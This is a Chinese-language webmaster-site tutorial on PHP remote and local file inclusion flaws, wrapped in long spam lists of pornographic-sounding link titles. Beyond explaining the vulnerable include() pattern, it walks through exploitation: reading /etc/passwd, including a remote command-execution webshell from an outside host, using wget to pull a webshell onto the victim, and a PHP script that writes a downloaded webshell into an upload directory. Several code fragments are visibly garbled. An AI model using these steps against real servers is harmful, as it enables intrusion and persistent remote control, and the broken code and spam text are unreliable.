亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际

17站長網

17站長網 首頁 安全 安全教程 查看內容

遠程包含和本地包含漏洞的原理

2022-9-24 10:15| 查看: 2606 |來源: 互聯網

首先,我們來討論包含文件漏洞,首先要問的是,什么才是"遠程文件包含漏洞"?回答是:服務器通過php的特性(函數)去包含任意文件時,由于要包含的這個文件來 ...

首先,我們來討論包含文件漏洞,首先要問的是,什么才是"遠程文件包含漏洞"?回答是:服務器通過php的特性(函數)去包含任意文件時,由于要包含的這個文件來源過濾不嚴,從而可去包含一個惡意文件,而我們可以構造這個惡意文件來達到邪惡的目的。幾乎所有的 cgi程序都有這樣的 bug,只是具體的表現方式不一樣罷了。

一、涉及到的危險函數〔include(),require()和include_once(),require_once()〕

include() && require()語句:包括并運行指定文件。

這兩種結構除了在如何處理失敗之外完全一樣。include() 產生一個警告而 require() 則導致一個致命錯誤。換句話說,如果你想在遇到丟失文件時停止處理頁面就用 require()。include() 就不是這樣,腳本會繼續運行。
如果"allow_url_fopen"在 PHP 中被激活(默認配置),也可以用 URL(通過 HTTP 或者其它支持的封裝協議)而不是本地文件來指定要被包括的文件。如果目標服務器將目標文件作為 PHP 代碼解釋,則可以用適用于HTTP GET 的 URL 請求字符串來向被包括的文件傳遞變量。

require_once()。ΓΑnclude_once()

require_once ()和include_once() 語句在腳本執行期間包括并運行指定文件。此行為和 require() 語句類似,唯一區別是如果該文件中的代碼已經被包括了,則不會再次包括。適用于在腳本執行期間同一個文件有可能被包括超過一次的情況下,你想確保它只被包括一次以避免函數重定義,變量重新賦值等問題。

二、為什么要包含文件

程序員寫程序的時候,不喜歡干同樣的事情,也不喜歡把同樣的代碼(比如一些公用的函數)寫幾次,于是就把需要公用的代碼寫在一個單獨的文件里面,比如 share.php,而后在其它文件進行包含調用。在php里,我們就是使用上面列舉的那幾個函數來達到這個目的的,它的工作流程:如果你想在 main.php里包含share.php,我將這樣寫include("share.php")就達到目的,然后就可以使用share.php中的函數了,像這個寫死需要包含的文件名稱的自然沒有什么問題,也不會出現漏洞,那么問題到底是出在哪里呢?
有的時候可能不能確定需要包含哪個文件,比如先來看下面這個文件index.php的代碼:

CODE: [Copy to clipboard]
--------------------------------------------------------------------------------

if ([page]) {
include GET[page];
} else {
include "home.
}

很正常的一段PHP代碼,它是怎么運作的呢?這里面涉及到GET的意義,我就不打算講了(要不又能寫篇HTTP的文章了),如果你還不了解GET,POST,等,那么你需要再Google一些相關的資料好好補一補了。
上面這段代碼的使用格式可能是這樣的:http://www.1steam.cn/php/index.php?page=main.php或者http: //www.1steam.cn/php/index.php?page=downloads.php ,結合上面代碼,簡單說下怎么運作的:

1.提交上面這個URL,在index.php中就取得這個page的值(_GET[page])。
2.判斷GET[page]是不是空,若不空(這里是main.php)就用include來包含這個文件。
3.若_GET[page]空的話就執行else,來include home.php 這個文件。

三、為什么會產生漏洞

你也許要說,這樣很好呀,可以按照URL來動態包含文件,多么方便呀,怎么產生漏洞的呢?問題的答案是:我們不乖巧,我們總喜歡和別人不一樣,我們不會按照他的鏈接來操作,我們可能想自己寫想包含(調用)的文件,比如我們會隨便的打入下面這個URL:http: //www.1steam.cn/php/index.php?page=hello.php。然后我們的index.php程序就傻傻按照上面我們說得步驟去執行:取page為hello.php,然后去include(hello.php),這時問題出現了,因為我們并沒有hello.php這個文件,所以它 include的時候就會報警告,類似下列信息:

Quote:
Warning: include(hello.php) [function.include]: failed to open stream: No such file or directory in /vhost/wwwroot/php/index.php on line 3
Warning: include() [function.include]: Failed opening 'hello.php' for inclusion (include_path='.:') in /vhost/wwwroot/php/index.php on line 3

注意上面的那個Warning就是找不到我們指定的hello.php文件,也就是包含不到我們指定路徑的文件;而后面的警告是因為前面沒有找到指定文件,所以包含的時候就出警告了。

四、怎么利用

上面可以看到,問題出現了,那么我們怎么利用這樣的漏洞呢,利用方法其實很多,但是實質上都是差不多的,我這里說三個比較常見的利用方法:

1.包含讀出目標機上其它文件

由前面我們可以看到,由于對取得的參數page沒有過濾,于是我們可以任意指定目標主機上的其它敏感文件,例如在前面的警告中,我們可以看到暴露的絕對路徑(vhost/wwwroot/php/),那么我們就可以多次探測來包含其它文件,比如指定URL為:http: //www.1steam.cn/php/index.php?page=./txt.txt 可以讀出當前路徑下的txt.txt文件,也可以使用.. /../進行目錄跳轉(在沒過濾../的情況下);也可以直接指定絕對路徑,讀取敏感的系統文件,比如這個URL:http: //www.1steam.cn/php/index.php?page=/etc/passwd ,如果目標主機沒有對權限限制的很嚴格,或者啟動 Apache的權限比較高,是可以讀出這個文件內容的。否則就會得到一個類似于:open_basedir restriction in effect.的Warning。

2.包含可運行的PHP木馬

如果目標主機的"allow_url_fopen"是激活的(默認是激活的,沒幾個人會修改),我們就可以有更大的利用空間,我們可以指定其它URL上的一個包含PHP代碼的webshell來直接運行,比如,我先寫一段運行命令的PHP代碼(加了注釋,應該看得懂),如下保存為cmd.txt(后綴不重要,只要內容為PHP格式就可以了)。

以上這個文件的作用就是接受cmd指定的命令,并調用passthru函數執行,把內容返回在1.S.T之間。把這個文件保存到我們主機的服務器上(可以是不支持PHP的主機),只要能通過HTTP訪問到就可以了,例如地址如下:http: //www.1ster.cn/cmd.txt ,然后我們就可以在那個漏洞主機上構造如下URL來利用了:http: //www.1steam.cn/php/index.php?page=http://www.1ster.cn/cmd.txt?cmd=ls ,其中 cmd后面的就是你需要執行的命令,其它常用的命令(以*UNIX為例)如下:

Quote:
ll 列目錄、文件(相當于Windows下dir)
pwd 查看當前絕對路徑
id whoami 查看當前用戶
wget 下載指定URL的文件

等等其它的,你主機去BAIDU找吧,就不列舉了。

上面的方法就是得到一個Webshell了(雖然這個PHP文件不在目標機上,但是它確實是個Webshell,不是么?呵呵)

3.包含一個創建文件的PHP文件

也許有的人認為還是得到目標機上的一個真實的Webshell比較放心,萬一哪天人家發現這兒個包含漏洞修補了,我們就不能再遠程包含得到上面的那個"偽 "Webshell了,不是么?可以理解這個心態,我們繼續。得到一個真實的Webshell,我們也說兩種常見的方法:

1)使用wget之類的命令來下載一個Webshell

這個比較簡單,也很常用,在上面我們得到的那個偽webshell中,我們可以執行命令,那么我們也可以調用系統中的一個很厲害的角色, wget,這個命令的強大你可以google下,參數一大堆,絕對搞暈你,呵呵,我們不需要那么復雜,我們就使用一個-O(--output- document=FILE,把文檔寫到FILE文件中) 就可以了,呵呵。

前提是你在按照前面的步驟放一個包含PHP代碼的Webshell在一個可以通過HTTP或者FTP等可以訪問的地方,比如:http: //www.1ster.cn/1stphp.txt ,這個文件里寫的就是Webshell的內容。然后我們在前面得到的偽Webshell中執行如下的 URL:http://www.1steam.cn/php/index.p ... w.1ster.cn/cmd.txt? cmd=wget http://www.1ster.cn/1stphp.txt -O 1stphp.php ,如果當前目錄可寫,就能得到一個叫做1stphp.php的Webshell了;如果當前目錄不可寫,還需要想其它的辦法。

2)使用文件來創建

前面的wget可能會遇到當前目錄不能寫的情況;或者目標主機禁用了(或者沒裝)這個命令,我們又需要變通一下了,我們可以結合前面的包含文件漏洞來包含一個創建文件(寫文件)的PHP腳本,內容如下:

CODE: [Copy to clipboard]
--------------------------------------------------------------------------------

$f=file_get_contents("www.1ster.cn/1stphp.打開指定路徑的文件流
$=fopen("./upload/1st.php","a");     //尋找一個可以的目錄,創建一個文件
fwrite (,$f);  //把前面打開的文件流寫到創建的文件里
fclose();    //關閉保存文件
?>

還是寫入我們上面用wget下載的那個php文件,但是我們改進了方法,用PHP腳本來實現,可以使用上面的cmd.php?cmd=ll查找可以寫的目錄,比如這里的upload,然后把文件創建在這個目錄下:./upload/1st.php。然后就得到我們的Webshell了。

本文最后更新于 2022-9-24 10:15,某些文章具有時效性,若有錯誤或已失效,請在網站留言或聯系站長:17tui@17tui.com
·END·
站長網微信號:w17tui,關注站長、創業、關注互聯網人 - 互聯網創業者營銷服務中心

免責聲明:本站部分文章和圖片均來自用戶投稿和網絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業用途,如果損害了您的權利,請聯系我們及時修正或刪除。謝謝!

17站長網微信二維碼

始終以前瞻性的眼光聚焦站長、創業、互聯網等領域,為您提供最新最全的互聯網資訊,幫助站長轉型升級,為互聯網創業者提供更加優質的創業信息和品牌營銷服務,與站長一起進步!讓互聯網創業者不再孤獨!

掃一掃,關注站長網微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际
        国产一区二区精品久久| 18涩涩午夜精品.www| 欧美激情一区二区三区全黄 | 色综合亚洲欧洲| 91黄色免费版| 欧美日韩高清一区二区| 免费看精品久久片| 亚洲午夜私人影院| 美女视频一区二区三区| 精品一区二区三区不卡 | 一区二区三区日韩精品视频| 亚洲免费观看高清在线观看| 成人丝袜视频网| 91精品国产麻豆| 精品一区二区免费看| 另类小说色综合网站| 久久综合九色综合97_久久久| 国产精品正在播放| 91啪在线观看| 久久亚洲综合av| 中文字幕一区三区| 亚洲一区二区精品视频| 欧美日韩一卡二卡三卡 | 亚洲地区一二三色| 国产激情一区二区三区桃花岛亚洲| 国产人伦精品一区二区| 椎名由奈av一区二区三区| 最新欧美精品一区二区三区| 免费在线视频一区| 亚洲精品视频在线观看网站| 青草av.久久免费一区| 久久久久综合网| 91九色最新地址| 欧美婷婷六月丁香综合色| 成人一区二区视频| 亚洲综合在线五月| 日本一区二区视频在线| 亚洲va国产天堂va久久en| 久久久久综合网| 中文字幕一区视频| 91精品国产综合久久精品图片 | 日韩av电影免费观看高清完整版| 五月天精品一区二区三区| 精品黑人一区二区三区久久| 在线欧美一区二区| 国产精品18久久久久久久网站| 成人欧美一区二区三区视频网页| 亚洲视频一区在线| 国产精品国产a| 99久久99久久久精品齐齐| 亚洲精品视频观看| 日韩精品一区二区三区蜜臀| 午夜精品一区二区三区电影天堂 | 日韩欧美在线不卡| 亚洲精品在线观看视频| 欧美精品 国产精品| 欧美一级黄色录像| 欧美日韩aaaaaa| 欧美成人性战久久| 国产成人综合网| 日韩欧美资源站| 国产一区二区精品久久| 成人性生交大片免费看在线播放| 日日骚欧美日韩| 国产精品传媒视频| 亚洲日本青草视频在线怡红院 | 国产午夜精品一区二区三区嫩草| 久久久久久久综合狠狠综合| 国产成人综合在线| 精品少妇一区二区三区 | 国产精品1024| 亚洲国产va精品久久久不卡综合| 亚洲成av人片在线观看| 日韩av网站免费在线| 99re这里都是精品| 亚洲6080在线| 精品国产第一区二区三区观看体验 | 色婷婷精品大视频在线蜜桃视频| 国产欧美日本一区二区三区| 欧美精品一区二区三区很污很色的 | 国产一区二区三区四| 欧美性猛片xxxx免费看久爱| 99综合电影在线视频| 欧美军同video69gay| 一区二区三区免费网站| 国产精品高清亚洲| 久久欧美中文字幕| 国产免费成人在线视频| 欧美国产国产综合| 中文av一区特黄| 欧美女孩性生活视频| 日韩成人免费看| 日韩亚洲欧美一区二区三区| 国产精品久久久久久久久免费丝袜 | 欧美一级久久久| 日韩精品一区国产麻豆| 4438x亚洲最大成人网| 91福利小视频| 色哟哟精品一区| 欧美一级夜夜爽| 午夜精品久久久久影视| 日韩一区国产二区欧美三区| 午夜视频一区二区三区| 美国十次了思思久久精品导航| 色美美综合视频| 99re这里只有精品首页| 日韩成人免费电影| 日本亚洲电影天堂| 日本韩国一区二区| 中国色在线观看另类| 美女免费视频一区二区| 色综合激情久久| 亚洲日本一区二区| 国产精品丝袜久久久久久app| 欧美日韩激情在线| 欧美亚洲国产一区二区三区va| 国产亚洲精久久久久久| 欧美日本国产一区| 欧美一区二区三区在线观看| 久久久久久久久岛国免费| 日韩专区一卡二卡| 6080亚洲精品一区二区| 日一区二区三区| 欧美中文字幕一区| 亚洲欧美一区二区久久 | 国产福利精品导航| 波多野结衣一区二区三区| 日本欧美一区二区在线观看| 国产精品久久久一本精品| 久久综合精品国产一区二区三区| 成人性视频免费网站| 欧美亚洲国产一区二区三区va | 国产福利不卡视频| 亚洲国产精华液网站w| 在线观看www91| 成人黄色电影在线| 天天综合色天天综合| 国产精品国产三级国产普通话99| 欧美va在线播放| 久久精品亚洲国产奇米99| 亚洲高清免费观看高清完整版在线观看| 欧美日韩在线播放一区| 色综合久久99| 久久久久久久网| 国产日韩欧美高清在线| 麻豆精品视频在线观看免费| 在线免费观看日本欧美| 91麻豆精品国产91久久久久久久久| 93久久精品日日躁夜夜躁欧美| 欧美日韩视频不卡| 7777精品伊人久久久大香线蕉的 | 久久久精品天堂| 国产一区二区三区四| 亚洲1区2区3区视频| 精品国产成人系列| 欧美成人精品福利| 国产成人一级电影| 国产精品系列在线| 欧美日韩一区二区在线观看| 99精品国产视频| 欧美精品乱人伦久久久久久| 国产一区二区伦理| 亚洲精品国产成人久久av盗摄| 激情综合一区二区三区| 国产精品蜜臀av| 成人免费看片app下载| 成人一区二区三区在线观看| 国产乱国产乱300精品| 午夜欧美电影在线观看| 精品剧情在线观看| 欧美成人性战久久| 一区av在线播放| 麻豆国产精品777777在线| 国产乱码精品一区二区三| 日本国产一区二区| 国产欧美日产一区| 免费一级欧美片在线观看| 99久久精品免费精品国产| 日韩一区二区三区在线| 综合亚洲深深色噜噜狠狠网站| 精品一区二区三区av| 欧美剧情片在线观看| 亚洲第一搞黄网站| 欧美色爱综合网| 亚洲成人动漫av| 欧美日韩中文字幕精品| 中文字幕亚洲综合久久菠萝蜜| 美女高潮久久久| 欧美一级欧美三级在线观看| 亚洲特黄一级片| 麻豆精品国产91久久久久久| 日韩一卡二卡三卡四卡| 国产精品一区二区无线| 综合自拍亚洲综合图不卡区| 色8久久精品久久久久久蜜| 日欧美一区二区| 中文字幕在线一区| 欧美一区三区四区| 精东粉嫩av免费一区二区三区| 国产日产欧美一区|